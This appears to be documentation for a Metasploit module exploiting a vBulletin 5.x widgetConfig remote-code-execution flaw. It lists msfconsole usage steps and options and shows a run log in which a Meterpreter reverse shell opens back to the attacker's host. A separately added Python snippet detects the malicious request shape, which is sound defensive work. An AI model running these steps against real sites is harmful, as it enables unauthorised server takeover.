vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring POST request.
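A defender-side check for the request shape described above, as an added example that is not part of the Metasploit module or the original page: it flags POST requests that carry both the ajax/render/widget_php route and a widgetConfig[code] parameter, whether URL-encoded or not. It assumes a proxy or WAF log that records form bodies; the function names and sample events are constructed for illustration.

```python
from urllib.parse import parse_qsl, unquote, urlsplit

# Indicators taken from the module description above.
ROUTE = "ajax/render/widget_php"
CODE_PARAM = "widgetconfig[code]"

# Constructed sample events: (method, request target, form body).
SAMPLES = [
    ("POST", "/index.php?routestring=ajax/render/widget_php",
     "widgetConfig%5Bcode%5D=PLACEHOLDER"),
    ("POST", "/forum/index.php",
     "routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=PLACEHOLDER"),
    ("POST", "/ajax/render/widget_php", "widgetConfig%5Bcolumns%5D=2"),
    ("GET", "/index.php?routestring=ajax/render/widget_php", ""),
    ("POST", "/index.php?routestring=search", "q=widget_php"),
]


def _params(encoded):
    """Decode a query string or form body into (lowercased key, value) pairs."""
    return [(k.strip().lower(), v)
            for k, v in parse_qsl(encoded, keep_blank_values=True)]


def is_widgetconfig_request(method, target, body=""):
    """True when a request has the shape described for this vulnerability.

    Assumption: method, target and body come from a reverse proxy or WAF
    log that records form bodies; plain access logs usually do not.
    """
    if method.upper() != "POST":
        return False
    url = urlsplit(target)
    params = _params(url.query) + _params(body)
    route_hit = any(k == "routestring" and v.strip("/").lower() == ROUTE
                    for k, v in params)
    # Assumption: with URL rewriting enabled the route can arrive as the path.
    path = unquote(url.path).strip("/").lower()
    route_hit = route_hit or path.endswith(ROUTE)
    return route_hit and any(k == CODE_PARAM for k, _ in params)


def flagged_samples():
    """Indexes of the constructed SAMPLES that match."""
    return [i for i, s in enumerate(SAMPLES) if is_widgetconfig_request(*s)]


if __name__ == "__main__":
    print(flagged_samples())
```

Requiring both indicators keeps ordinary widget rendering requests, which use the same route without a code parameter, out of the results.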
- Install the module as usual
- Start msfconsole
- Do: use exploit/multi/http/vbulletin_widgetconfig_rce
- Do: set RHOSTS [IP]
- Do: set LHOST [IP]
- Do: run
Id Name
-- ----
0 Automatic (Dropper)
1 Linux (Stager)
2 Windows (Stager)
3 Unix (In-Memory)
4 Windows (In-Memory)
PHP_CMD
Specify the PHP function with which to execute the payload. Default: shell_exec
TARGETURI
The base URI path of vBulletin. Default: /
ForceExploit
Override check result.
A proof of concept was originally published on seclists.org.
msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set lhost 192.168.1.13
lhost => 192.168.1.13
msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > run
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Sending php/meterpreter/reverse_tcp command payload
[*] Sending stage (38288 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.13:4444 -> 192.168.1.25:35772) at 2019-10-18 13:53:39 +0400
meterpreter >